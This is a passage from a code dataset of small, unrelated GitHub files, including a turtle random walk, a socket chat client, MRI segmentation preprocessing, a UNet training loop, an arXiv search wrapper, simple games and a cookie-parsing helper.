If its heads then turn to the left 90 degrees.\n# If its tails then turn to the right 90 degrees.\n# Take 50 steps forward.\n# If the turtle has moved outside the screen then stop,\n# otherwise go back to step 2 and repeat.\n\nimport turtle\nimport random\n\ndef in_bounds(t):\n\n turtlex = t.xcor() #coordinates for turtle\n turtley = t.ycor()\n\n still_in = True # determine true/false for\n if int(turtlex) not in range(-300, 300): # bounds of turtle\n still_in = False\n if int(turtley) not in range(-300, 300):\n still_in = False\n return still_in\n\ndef flip_a_coin(t):\n coin = random.randint(0,2) # turtle doing random turns\n if coin == 0:\n t.lt(90)\n else:\n t.rt(90)\n t.fd(50) # turtle moving forward\n\ndef main():\n wn = turtle.Screen()\n wn.bgcolor('black')\n blu = turtle.Turtle()\n blu.showturtle()\n # blu.setpos(0, 0)\n blu.color('green')\n blu.pensize(2)\n blu.pendown()\n wn.setup(600, 600, startx=None, starty=None)\n while in_bounds(blu):\n flip_a_coin(blu)\n wn.exitonclick()\nmain()\n","repo_name":"nreis11/practice","sub_path":"turtle_practice.py","file_name":"turtle_practice.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33548966142","text":"# pylint: disable=protected-access\nimport json\n\nimport pytest\n\n\n@pytest.mark.parametrize(\n 'request_body, expected_status, expected_response',\n [\n ({}, 400, {'schemas': []}),\n (\n {\n 'source_type': 'postgres',\n 'schema_database': 'does-not-exist',\n 'source_ident': 'table_name',\n },\n 400,\n None,\n ),\n (\n {\n 'source_type': 'postgres',\n 'source_ident': 'table_name',\n 'secret': {\n 'secret_id': 'STRONGBOX_ID',\n 'secret_type': 'strongbox',\n },\n },\n 404,\n None,\n ),\n ],\n)\nasync def test_schemas_retrieve(\n replication_client, request_body, expected_status, expected_response,\n):\n response = await replication_client.post(\n f'/schemas/v1/source/retrieve', data=json.dumps(request_body),\n )\n assert response.status == expected_status, await response.text()\n if expected_status == 200:\n assert await response.json() == expected_response\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_replication/api/test_schemas_source_retrieve.py","file_name":"test_schemas_source_retrieve.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35613756271","text":"from datetime import datetime\nimport socket\nfrom threading import Thread\nimport json\nfrom time import sleep\nHOST = 'lockscale.kro.kr'\nPORT = 5000\nID = 1234\n\ndef socket_connect():\n global client_socket\n print(\"connecting\")\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n client_socket.settimeout(10)\n sleep(5)\n client_socket.connect((HOST, PORT))\n except:\n return\n socket_send(\"new\")\n sleep(0.5)\n\n\ndef socket_send(data):\n send = {\n 'identify': 'region',\n 'id': ID,\n 'data': data\n }\n try:\n client_socket.send(json.dumps(send).encode())\n print(\"Send Success\")\n except:\n print(\"Send Failed\")\n\n\ndef receiver():\n while True:\n try:\n recv = client_socket.recv(1024)\n if len(recv) == 0:\n print(\"disconnected\")\n socket_connect()\n\n data = json.loads(recv.decode())\n status = data.get('status')\n info = data.get('data')\n if status == \"ok\":\n print(\"연결됨\")\n if not info:\n break\n info.get(\"id\")\n except:\n pass\n\n\ndef concurrent():\n while True:\n sleep(60)\n message = 
        socket_send(message)\n\n\n# Sends the string typed on the keyboard to the server and\n# prints the message echoed back from the server to the screen.\n# Repeats until 'quit' is entered.\nif __name__ == \"__main__\":\n    socket_connect()\n    Thread(target=receiver).start()\n    Thread(target=concurrent).start()\n    while True:\n        message = input()\n        socket_send(message)\n    client_socket.close()\n","repo_name":"wkdguswo16/project_local","sub_path":"serversocket.py","file_name":"serversocket.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15485145391","text":"#This is a simple project that computes the national average of the temperatures across the months and identifies which months had temperatures above that average\n# This project can be used as an example for understanding the use of lists, loops and conditionals in Python.\nmeses = [\n    'Janeiro',\n    'Fevereiro',\n    'Março',\n    'Abril',\n    'Maio',\n    'Junho',\n    'Julho',\n    'Agosto',\n    'Setembro',\n    'Outubro',\n    'Novembro',\n    'Dezembro'\n]\n\ntemperaturas = [30, 29, 28, 28, 25, 26, 20, 21, 19, 25, 27, 32]\n\n\nmedia_nacional = sum(temperaturas)/len(temperaturas)\nprint(f'The national average is {media_nacional:.1f} degrees.')\nmeses_acima = []\nfor i, qtde in enumerate(meses):\n    #print(meses[i], temperaturas[i])\n    if temperaturas[i] > media_nacional:\n        meses_acima.append(qtde)\n#print(meses_acima)\nprint(f'The months with temperatures above the average were: {meses_acima}')","repo_name":"SoeCode/mini_projetos","sub_path":"temperatura_meses.py","file_name":"temperatura_meses.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
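In the serversocket record above, receiver() feeds each recv(1024) chunk straight into json.loads, which fails as soon as a message is split across chunks or two messages arrive back to back. Newline-delimited framing is a common fix; a sketch, where `sock` is assumed to be a connected TCP socket:

```python
import json

# Newline-delimited JSON framing. A bare recv(1024) can hand json.loads a
# partial document or several concatenated ones; buffering up to '\n'
# handles both cases.
def send_json(sock, obj):
    sock.sendall((json.dumps(obj) + '\n').encode())


def recv_json(sock):
    buf = b''
    while True:
        chunk = sock.recv(1024)
        if not chunk:                  # peer closed the connection
            return
        buf += chunk
        while b'\n' in buf:
            line, buf = buf.split(b'\n', 1)
            yield json.loads(line.decode())
```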
+{"seq_id":"30177425121","text":"import numpy as np\n\n\"\"\"\nContains preprocessing code for creating additional information based on MRI volumes and true segmentation maps (asegs).\nE.g. weight masks for median frequency class weighting, edge weighting etc.\n\"\"\"\n\ndef create_weight_mask(aseg):\n    \"\"\"\n    Main function for calculating the weight mask of a segmentation map for the loss function. Currently only Median Frequency\n    Weighting is implemented. Other types can be additively added to the 'weights' variable\n\n    Args:\n        aseg (numpy.ndarray): Segmentation map with shape l x w x d\n\n    Returns:\n        numpy.ndarray: Weight Mask of same shape as aseg\n    \"\"\"\n    if len(aseg.shape)==4:\n        _, h,w,d = aseg.shape\n    elif len(aseg.shape)==3:\n        h,w,d = aseg.shape\n\n    weights = np.zeros((h,w,d), dtype=float) # Container ndarray of zeros for weights\n\n    weights += median_freq_class_weighing(aseg) # Add median frequency weights\n\n    # Further weights (eg. extra weights for region borders) can be added here\n    # Eg. weights += edge_weights(aseg)\n\n    return weights\n\n\ndef median_freq_class_weighing(aseg):\n    \"\"\"\n    Median Frequency Weighting, guarded against the absence of individual classes in the sample.\n\n    Args:\n        aseg (numpy.ndarray): Segmentation map with shape l x w x d\n\n    Returns:\n        numpy.ndarray: Median frequency weighted mask of same shape as aseg\n    \"\"\"\n\n    # Calculates median-frequency-based weighting for the classes\n    unique, counts = np.unique(aseg, return_counts=True)\n    if len(aseg.shape)==4:\n        _, h,w,d = aseg.shape\n    elif len(aseg.shape)==3:\n        h,w,d = aseg.shape\n\n    class_wise_weights = np.median(counts)/counts\n    aseg = aseg.astype(int)\n\n    # Guards against the absence of certain classes in sample\n    discon_guard_lut = np.zeros(int(max(unique))+1)-1\n    for idx, val in enumerate(unique):\n        discon_guard_lut[int(val)] = idx\n\n    discon_guard_lut = discon_guard_lut.astype(int)\n\n    # Assigns weights to w_mask and resets the missing classes\n    w_mask = np.reshape(class_wise_weights[discon_guard_lut[aseg.ravel()]], (h, w, d))\n    return w_mask\n\n\n# Label mapping functions (to aparc (eval) and to label (train))\ndef map_label2aparc_aseg(mapped_aseg):\n    \"\"\"\n    Function to perform look-up table mapping from label space to aparc.DKTatlas+aseg space\n    :param np.ndarray mapped_aseg: label space segmentation (aparc.DKTatlas + aseg)\n    :return:\n    \"\"\"\n    aseg = np.zeros_like(mapped_aseg)\n    labels = np.array([0, 2, 4, 5, 7, 8, 10, 11, 12, 13, 14,\n                       15, 16, 17, 18, 24, 26, 28, 31, 41, 43, 44,\n                       46, 47, 49, 50, 51, 52, 53, 54, 58, 60, 63,\n                       77, 1002, 1003, 1005, 1006, 1007, 1008, 1009, 1010, 1011,\n                       1012, 1013, 1014, 1015, 1016, 1017, 1018, 1019, 1020, 1021, 1022,\n                       1023, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1034, 1035,\n                       2002, 2005, 2010, 2012, 2013, 2014, 2016, 2017, 2021, 2022, 2023,\n                       2024, 2025, 2028])\n    h, w, d = aseg.shape\n\n    aseg = labels[mapped_aseg.ravel()]\n\n    aseg = aseg.reshape((h, w, d))\n\n    return aseg\n\n\n# if __name__ == \"__main__\":\n#     #a = np.random.randint(0, 5, size=(10,10,10))\n#     #b = np.random.randint(5, 10, size=(10000))\n#\n#     #map_masks_into_5_classes(np.random.randint(0, 250, size=(256, 256, 256)))\n#\n#     import nibabel as nib\n#     from data_utils.process_mgz_into_hdf5 import map_aparc_aseg2label, map_aseg2label\n#     path = r\"abide_ii/sub-28675/mri/aparc.DKTatlas+aseg.mgz\"\n#     aseg = nib.load(path).get_data()\n#     labels_full, _ = map_aparc_aseg2label(aseg) # only for 79 classes case\n#     # labels_full, _ = map_aseg2label(aseg) # only for 37 classes case\n#     aseg = labels_full\n#     # print(aseg.shape)\n#     median_freq_class_weighing(aseg)\n#     # print(edge_weighing(aseg, 1.5))\n","repo_name":"Deep-MI/3d-neuro-seg","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
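On a toy label volume the effect of the median-frequency step above is easy to see: classes rarer than the median count get weights above 1, frequent ones below. A small demonstration of the counts-to-weights computation:

```python
import numpy as np

# Counts-to-weights step of median-frequency class weighting on a toy volume:
# the rare class is up-weighted, the dominant background down-weighted.
aseg = np.zeros((4, 4, 4), dtype=int)
aseg[0, 0, :2] = 1                       # 2 voxels of class 1, 62 of class 0

unique, counts = np.unique(aseg, return_counts=True)
class_weights = np.median(counts) / counts
print(dict(zip(unique.tolist(), np.round(class_weights, 3).tolist())))
# {0: 0.516, 1: 16.0} since median(62, 2) = 32, giving 32/62 and 32/2
```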
+{"seq_id":"5787568960","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom . import models\n\n\nclass EntryForm(forms.ModelForm):\n\n    # def __init__(self, *args, **kwargs):\n    #     self.user = kwargs.pop('user', None)\n    #     super(EntryForm, self).__init__(*args, **kwargs)\n    #\n    # def clean_phone_number(self):\n    #     c = self.cleaned_data['phone_number']\n    #     if models.Entry.objects.filter(user=self.user).exists():\n    #         raise ValidationError('error')\n    #     return c\n\n    class Meta:\n        model = models.Entry\n        fields = (\n            'name',\n            'last_name',\n            'phone_number',\n        )\n","repo_name":"pouria-azizi/Phonebook-Project","sub_path":"phonebook/phones/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5100548414","text":"import os\nimport torch\nfrom visdom import Visdom\nfrom util import loadYaml, parseArgs\nfrom network.UNet import ScaleUNet\nfrom dataset.gopro import GoProDataset\nfrom torch.utils.data import DataLoader\nfrom torch.optim import lr_scheduler\nimport dataset.util as util\n\n\nargs = parseArgs()\nconfig, saveName = loadYaml(args.config)\n\nos.environ['CUDA_VISIBLE_DEVICES'] = config['gpu_available']\ndevice_ids = range(config['gpu_num'])\n\ndef print_model(model):\n    for n, p in model.named_parameters():\n        print(n, p.shape)\n\ndef trainScaledUNet():\n    trainSet = GoProDataset(sharp_root=config['train_sharp'], blur_root=config['train_blur'],\n                            resize_size=config['resize_size'], patch_size=config['crop_size'],\n                            phase='train')\n    testSet = GoProDataset(sharp_root=config['test_sharp'], blur_root=config['test_blur'],\n                           resize_size=config['resize_size'], patch_size=config['crop_size'],\n                           phase='test')\n\n    train_loader = DataLoader(trainSet,\n                              batch_size=config['batchsize'],\n                              shuffle=True, num_workers=4,\n                              drop_last=True, pin_memory=True)\n    test_loader = DataLoader(testSet, batch_size=1,\n                             shuffle=False, num_workers=1,\n                             drop_last=False, pin_memory=True)\n    su, sd = config['scaleup'],config['scaledown']\n    scale_ratio = 13/16\n    model = ScaleUNet(3, 3, su, sd)\n    model = torch.nn.DataParallel(model.cuda(), device_ids=device_ids)\n    print_model(model)\n\n    if config['pretrained_model'] != 'None':\n        print('loading Pretrained {}'.format(config['pretrained_model']))\n        model.load_state_dict(torch.load(config['pretrained_model']))\n\n    startEpoch = config['start_epoch']\n    optimizer = torch.optim.Adam(model.parameters(), lr=config['lr'])\n    scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=config['step'], gamma=0.5) # learning rates\n\n    mse = torch.nn.L1Loss()  # note: named mse, but this is an L1 loss\n    viz = Visdom(env=saveName)\n    bestPSNR = config['bestPSNR']\n\n    for epoch in range(startEpoch, 1000000):\n        avg_loss = 0.0\n        idx = 0\n        model.train()\n        for i, train_data in enumerate(train_loader):\n            idx += 1\n            train_data['L'] = train_data['L'].cuda()\n            train_data['H'] = train_data['H'].cuda()\n            optimizer.zero_grad()\n            sharp = model(train_data['L'])\n            loss = mse(sharp, train_data['H'])\n            loss.backward()\n            optimizer.step()\n\n            avg_loss += loss.item()\n            if idx % 100 == 0:\n                print(\"epoch {}: trained {}\".format(epoch, idx))\n\n        scheduler.step()\n        avg_loss = avg_loss / idx\n        print(\"epoch {}: total loss : {:<7.5f}, lr : {}\".format(\n            epoch, avg_loss, scheduler.get_lr()[0]))\n        viz.line(\n            X=[epoch],\n            Y=[avg_loss],\n            win='{}/{}UNettrainMSELoss'.format(su, sd),\n            opts=dict(title='mse', legend=['train_mse']),\n            update='append')\n\n        if epoch % config['save_epoch'] == 0:\n            with torch.no_grad():\n                model.eval()\n                avg_PSNR = 0\n                idx = 0\n                for test_data in test_loader:\n                    idx += 1\n                    test_data['L'] = test_data['L'].cuda()\n
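The commented-out __init__/clean_phone_number in EntryForm above sketches per-user uniqueness validation; completing it usually looks like the following. This is a sketch, not the project's code: it assumes Entry has a `user` field (as the commented filter implies) and that the view passes user= when instantiating the form.

```python
# Sketch completing the commented-out validation in EntryForm. Assumptions:
# models.Entry has a `user` field, and the caller supplies user=request.user.
from django import forms
from django.core.exceptions import ValidationError

from . import models


class EntryFormStrict(forms.ModelForm):

    def __init__(self, *args, **kwargs):
        self.user = kwargs.pop('user', None)
        super().__init__(*args, **kwargs)

    def clean_phone_number(self):
        phone = self.cleaned_data['phone_number']
        qs = models.Entry.objects.filter(user=self.user, phone_number=phone)
        if self.instance.pk:               # editing: do not match ourselves
            qs = qs.exclude(pk=self.instance.pk)
        if qs.exists():
            raise ValidationError('You already saved this phone number.')
        return phone

    class Meta:
        model = models.Entry
        fields = ('name', 'last_name', 'phone_number')
```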
                    sharp = model(test_data['L'])\n                    sharp = sharp.detach().float().cpu()\n                    sharp = util.tensor2uint(sharp)\n                    test_data['H'] = util.tensor2uint(test_data['H'])\n                    current_psnr = util.calculate_psnr(sharp, test_data['H'], border=0)\n\n                    avg_PSNR += current_psnr\n                    if idx % 100 == 0:\n                        print(\"epoch {}: tested {}\".format(epoch, idx))\n                avg_PSNR = avg_PSNR / idx\n                print(\"total PSNR : {:<7.5f}\".format(\n                    avg_PSNR))\n                viz.line(\n                    X=[epoch],\n                    Y=[avg_PSNR],\n                    win='{}/{}UNettestPSNR'.format(su, sd),\n                    opts=dict(title='psnr', legend=['valid_psnr']),\n                    update='append')\n                if avg_PSNR > bestPSNR:\n                    bestPSNR = avg_PSNR\n                    save_path = os.path.join(config['model_dir'], \"{}_{}UNet\".format(su,sd) + config['modelName'])\n                    if not os.path.exists(config['model_dir']):\n                        os.mkdir(config['model_dir'])\n                    torch.save(model.state_dict(), save_path)\n\n\nif __name__ == '__main__':\n    trainScaledUNet()\n","repo_name":"HugoAhoy/UNet-Pruning-on-Deblur","sub_path":"ScaledNet/trainScaledUNet.py","file_name":"trainScaledUNet.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43462224010","text":"from gamedata import data\r\nimport random\r\nfrom art import logo, vs\r\n\r\n\r\n\r\n\r\n\r\n\r\nfinish = True\r\n\r\npoint = 0\r\n\r\nfirst = random.choice(data)\r\nprint(logo)\r\n\r\n\r\n\r\nwhile finish != False:\r\n    second = random.choice(data)\r\n    print(first['follower_count'])\r\n    print(second['follower_count'])\r\n    print(\"*****************\")\r\n    print(\"Compare A: \"+first['name']+\",\"+first['description'])\r\n    print(vs)\r\n    print(\"Compare B: \"+second['name']+\",\"+second['description'])\r\n    a = input(\"make a choice\")\r\n\r\n    if a == \"A\":\r\n        if first['follower_count'] > second['follower_count']:\r\n            point += 1\r\n            first = second\r\n        else:\r\n            finish=False\r\n            print(f\"You lost. Your score is {point}\")\r\n    else:\r\n        if second['follower_count'] > first['follower_count']:\r\n            point += 1\r\n            first = second\r\n        else:\r\n            finish=False\r\n            print(f\"You lost. Your score is {point}\")\r\n","repo_name":"krakeklan/Higher-Lower-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33102337297","text":"v1 = int(input('first value: '))\r\nv2 = int(input('second: '))\r\nv3 = int(input('third: '))\r\nmaior = v1\r\nif v2 > maior:\r\n    maior = v2\r\nif v3 > maior:\r\n    maior = v3\r\nprint('Largest: ', maior)\r\n\r\nmenor = v1\r\nif v2 < menor:\r\n    menor = v2\r\nif v3 < menor:\r\n    menor = v3\r\nprint('Smallest: ', menor)","repo_name":"joao2dev/python","sub_path":"exercicios python/ex033.py","file_name":"ex033.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
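In the deblurring script above, util.calculate_psnr is project code; the metric itself, for 8-bit images, is only a log-scaled MSE. A minimal NumPy version (details such as border cropping may differ from the project's util):

```python
import numpy as np

# Minimal PSNR for 8-bit images, the quantity the validation loop averages.
def psnr(img1, img2, max_val=255.0):
    mse = np.mean((img1.astype(np.float64) - img2.astype(np.float64)) ** 2)
    if mse == 0:
        return float('inf')
    return 20.0 * np.log10(max_val / np.sqrt(mse))


a = np.zeros((8, 8), dtype=np.uint8)
b = a.copy()
b[0, 0] = 16                  # one differing pixel out of 64, so MSE = 4
print(round(psnr(a, b), 2))   # 42.11 dB
```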
+{"seq_id":"4055972991","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nindexdatas = pd.date_range(\"20191127\", periods=6)\r\ndf = pd.DataFrame(np.arange(24).reshape((6, 4)), index=indexdatas, columns=['A', 'B', 'C', 'D'])\r\n\r\ndf.iloc[0, 1] = np.nan\r\ndf.iloc[1, 2] = np.nan  # numpy's NaN is a constant that represents a missing value\r\nprint(df.dropna(axis=0, how='any'))  # drop rows; 'any': drop as soon as one NaN is present; 'all': drop only when every value is NaN\r\nprint(df.fillna(value=0))  # replace every NaN in the table with 0\r\n\"\"\" neither of the two functions above modifies the table itself \"\"\"\r\nprint(df.isnull())  # prints a boolean table: True where NaN is located, False elsewhere\r\nprint(np.any(df.isnull()))  # returns a single bool: whether the table contains any NaN at all\r\n","repo_name":"Max6411/Python_","sub_path":"Pandas-4-Handling missing data.py","file_name":"Pandas-4-Handling missing data.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43237541759","text":"\"\"\"\nModule containing the implementation of the ArxivAPI class, which performs searches against the arXiv scientific-article repository.\n\nThe ArxivAPI class implements the APIExtraction interface and provides the following public methods:\n- is_valid_search_type(search_type): checks whether a search type is valid.\n- construct_query(queries, search_types, operators): builds a query from a list of search terms, search types and operators.\n- search(queries, search_types, operators=None): runs an arXiv search from a list of search terms, search types and operators.\n- search_multiple_terms(terms): runs an arXiv search for a list of search terms, combining the results.\n- is_valid_sort_value(value): checks whether a sort value is valid.\n\nIn addition, the module uses the following classes:\n- APIResponse: base class for API responses.\n- APISuccessResponse(APIResponse): class for successful API responses.\n- APIErrorResponse(APIResponse): class for API error responses.\n\"\"\"\n\nfrom typing import List, Union\nimport urllib.parse\nimport urllib.request\nimport feedparser\nfrom infrastructure.api_abstract import APIExtraction\nfrom models.api_model import APIResponse, APISuccessResponse, APIErrorResponse\nfrom models.paper_model import ArticleMetadata\n\nclass ArxivAPI(APIExtraction):\n    \"\"\"\n    Class representing an API for extracting information about scientific articles from arXiv.\n\n    Attributes:\n    ----------\n    BASE_URL : str\n        Base URL of the API.\n    valid_search_types : List[str]\n        List of valid search types.\n    max_results : int\n        Maximum number of results to fetch per search.\n    \"\"\"\n\n    BASE_URL = (\"http://export.arxiv.org/api/query?\"\n                \"search_query={}&sortBy=lastUpdatedDate&sortOrder=ascending&max_results={}\")\n    valid_search_types = [\"ti\", \"au\", \"abs\", \"co\", \"jr\", \"cat\", \"rn\", \"id\", \"all\"]\n\n    def __init__(self, max_results=10):\n        self.max_results = max_results\n\n    def is_valid_search_type(self, search_type):\n        \"\"\"\n        Checks whether the given search type is valid.\n\n        Parameters:\n        -----------\n        search_type : str\n            Search type to check.\n\n        Returns:\n        --------\n        bool\n            True if the search type is valid, False otherwise.\n        \"\"\"\n        return search_type in self.valid_search_types\n\n    def construct_query(self, queries, search_types, operators):\n        \"\"\"\n        Builds a query for the arXiv API from the given queries, search types and operators.\n\n        Parameters:\n        -----------\n        queries : List[str]\n            List of queries to run.\n        search_types : List[str]\n            List of search types corresponding to each query.\n        operators : List[str]\n            List of operators to use between the queries.\n\n        Returns:\n        --------\n        str\n            Query built from the given queries, search types and operators.\n        \"\"\"\n        if not all([self.is_valid_search_type(st) for st in search_types]):\n            raise ValueError(\"Invalid search type provided.\")\n        queries = [q.lower() for q in queries]\n
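A natural companion to the dropna()/fillna() calls in the pandas record above is per-column NaN accounting, and imputing with a statistic instead of a constant; a short sketch:

```python
import numpy as np
import pandas as pd

# Per-column NaN accounting, then mean-imputation instead of a constant fill.
df = pd.DataFrame({'A': [1.0, np.nan, 3.0], 'B': [np.nan, np.nan, 6.0]})
print(df.isna().sum())       # NaNs per column: A -> 1, B -> 2
print(df.fillna(df.mean()))  # fill each hole with its column's mean
```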
        search_types = [st.lower() for st in search_types]\n        combined_queries = []\n        for i, (query, search_type) in enumerate(zip(queries, search_types)):\n            combined_query = \"{}:{}\".format(search_type, query)\n            combined_queries.append(combined_query)\n            if i < len(queries) - 1:\n                combined_queries.append(operators[i])\n        return '+'.join(combined_queries)\n\n    def search(self, queries, search_types, operators=None) -> APIResponse:\n        \"\"\"\n        Runs a search against the arXiv API and returns an API response with the information of the articles found.\n\n        Parameters:\n        -----------\n        queries : List[str]\n            List of queries to run.\n        search_types : List[str]\n            List of search types corresponding to each query.\n        operators : Optional[List[str]], default=None\n            List of operators to use between the queries. If not provided, \"AND\" is used as the default operator.\n\n        Returns:\n        --------\n        APIResponse\n            API response with the information of the articles found.\n        \"\"\"\n        if operators is None:\n            operators = [\"AND\"] * (len(queries) - 1)\n        try:\n            constructed_query = self.construct_query(queries, search_types, operators)\n            url = self.BASE_URL.format(constructed_query, self.max_results)\n            response = urllib.request.urlopen(url)\n            feed = feedparser.parse(response.read().decode('utf-8'))\n            articles = []\n            for entry in feed.entries:\n                articles.append(ArticleMetadata(\n                    entry.title,\n                    entry.summary,\n                    entry.published,\n                    entry.link\n                ))\n            return APISuccessResponse(data=articles)\n        except Exception as e:\n            return APIErrorResponse(error_message=str(e))\n\n    def search_multiple_terms(self, terms) -> Union[APISuccessResponse, APIErrorResponse]:\n        \"\"\"\n        Runs a search against the arXiv API for each given term and returns a combined API response with the information of the articles found.\n\n        Parameters:\n        -----------\n        terms : List[str]\n            List of terms to search for.\n\n        Returns:\n        --------\n        Union[APISuccessResponse, APIErrorResponse]\n            API response with the information of the articles found, or an error response if no results were found for any term.\n        \"\"\"\n        combined_articles = []\n        for term in terms:\n            response = self.search([term], [\"all\"])\n            if isinstance(response, APISuccessResponse):\n                combined_articles.extend(response.data)\n        if combined_articles:\n            return APISuccessResponse(data=combined_articles)\n        else:\n            return APIErrorResponse(error_message=\"No results found for any term.\")\n\n    def is_valid_sort_value(self, value) -> bool:\n        pass\n\n\nif __name__ == \"__main__\":\n    api = ArxivAPI(max_results=20)\n    results_combined = api.search([\"Rovs\", \"AUV\"], [\"all\", \"all\"], [\"OR\"])\n    if isinstance(results_combined, APISuccessResponse):\n        for paper in results_combined.data:\n            print(paper)\n    else:\n        print(f\"Error: {results_combined.error_message}\")","repo_name":"tadeusER/botpaper","sub_path":"src/service/service_arxiv.py","file_name":"service_arxiv.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70017491090","text":"import pygame\r\nimport pygame.gfxdraw\r\n\r\npygame.init()\r\n\r\nwin = pygame.display.set_mode((500, 400))\r\npygame.display.set_caption('Pause Button')\r\n\r\n\r\nclass Pause:\r\n\r\n    def __init__(self, pos, win):\r\n        self.pos = pos\r\n        self.x = self.pos[0]\r\n        self.y = self.pos[1]\r\n        self.radius = 50\r\n        
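Stripped of the project's response wrappers, the same arXiv call needs only urllib plus feedparser; the search_query syntax below matches what construct_query() produces (field prefix, ':', term, '+AND+' between clauses). Note this sketch performs a live HTTP request:

```python
import urllib.request
import feedparser

# Direct query against the arXiv export API, using construct_query()'s
# `field:term` syntax joined by '+AND+'.
url = ('http://export.arxiv.org/api/query?'
       'search_query=all:electron+AND+cat:physics.optics&max_results=3')
feed = feedparser.parse(urllib.request.urlopen(url).read())
for entry in feed.entries:
    print(entry.title, '->', entry.link)
```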
self.win = win\r\n\r\n def draw(self):\r\n pygame.draw.circle(self.win, (0, 0, 0),\r\n center=self.pos, radius=self.radius, width=5)\r\n pygame.draw.line(self.win, (0, 0, 0), (self.x - self.radius/3, self.y - self.radius//1.5 ), (self.x - self.radius/3, self.y + self.radius//1.5 ),\r\n width=3)\r\n pygame.draw.line(self.win, (0, 0, 0), (self.x + self.radius/3, self.y - self.radius//1.5 ), (self.x + self.radius/3, self.y + self.radius//1.5 ),\r\n width=3)\r\n\r\nif __name__ == '__main__':\r\n\r\n pauseButton = Pause((200, 200), win)\r\n\r\n run = True\r\n while run:\r\n events = pygame.event.get()\r\n for event in events:\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n win.fill((255, 255, 255))\r\n #pygame.gfxdraw.aacircle(win, 100, 100, 15, (0,0,0))\r\n pauseButton.draw()\r\n pygame.display.flip()\r\n\r\n\r\n pygame.quit()\r\n","repo_name":"Y0shicon/Collision-Simulator","sub_path":"Tests/pauseButton.py","file_name":"pauseButton.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28470558113","text":"answer = []\nvisit = []\ndef can(x,y,move,places):\n global answer, visit\n dx = [0,1,0,-1]\n dy = [1,0,-1,0]\n visit[x][y] = False\n if move == 2:\n return\n for i, j in zip(dx, dy):\n if x+i >= 0 and y+j >= 0 and x+i<5 and y+j<5 and places[x+i][y+j] != 'X' and visit[x+i][y+j]:\n if places[x+i][y+j] == 'P':\n #print(x+i,y+j,move)\n answer.append(1)\n return\n can(x+i,y+j,move+1,places)\n return\n\ndef solution(places):\n global answer, visit\n ans = []\n for q in range(len(places)):\n for w in range(5):\n for e in range(5):\n if places[q][w][e] == 'P':\n visit = [[True] * 5 for _ in range(5)]\n #print('visit')\n can(w,e,0,places[q])\n if sum(answer) == 0:\n ans.append(1)\n else:\n ans.append(0)\n answer = []\n return ans\n\n\nprint(solution([[\"POOOP\", \"OXXOX\", \"OPXPX\", \"OOXOX\", \"POXXP\"], [\"POOPX\", \"OXPXP\", \"PXXXO\", \"OXXXO\", \"OOOPP\"], [\"PXOPX\", \"OXOXP\", \"OXPXX\", \"OXXXP\", \"POOXX\"], [\"OOOXX\", \"XOOOX\", \"OOOXX\", \"OXOOX\", \"OOOOO\"], [\"PXPXP\", \"XPXPX\", \"PXPXP\", \"XPXPX\", \"PXPXP\"]]))","repo_name":"elves37/Algorithm","sub_path":"차근차근/24DFS와BFS/asd.py","file_name":"asd.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33871349265","text":"class CookieWork:\n def __init__(self):\n pass\n\n def formatCookie(coo):\n cookieSplit = coo.split(';')\n properCookie = {}\n for i in cookieSplit:\n newI = (i.replace('=', ':', 1)).replace(' ', '')\n reSplitter = (newI.split(':', 1))\n properCookie[reSplitter[0]] = reSplitter[1]\n return properCookie\n\n # sends a dict of cookies into a file to allow you to play around with cookies, remove cookies and see what works\n def intoFile(coo, file):\n try:\n with open(file, 'w') as f:\n for i in coo:\n f.write('{}: {}'.format(i, coo[i]))\n f.write('\\n')\n except FileNotFoundError:\n print('Error Opening File')\n except:\n print('Error')\n\n # takes in a text file of headers, formats them into a key:value pairing\n def readFile(file):\n with open(file) as f:\n header_list = []\n for line in f:\n header_list.append((line.strip('\\n')).replace(':', ''))\n\n data_dict = {header_list[i]: header_list[i + 1] for i in range(0, len(header_list), 2)}\n\n return data_dict\n\n # redirects to read file for headers\n def get_headers(file):\n return CookieWork.readFile(file)\n\n # redirects to read file for cookies\n def 
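The recursive neighbour walk in the seating-distance record above is easier to get right as a breadth-first search bounded at Manhattan distance 2, which is the standard approach to this check; a self-contained sketch for one 5x5 place:

```python
from collections import deque

# Distance-2 check for one 5x5 seating map: returns False when two 'P's sit
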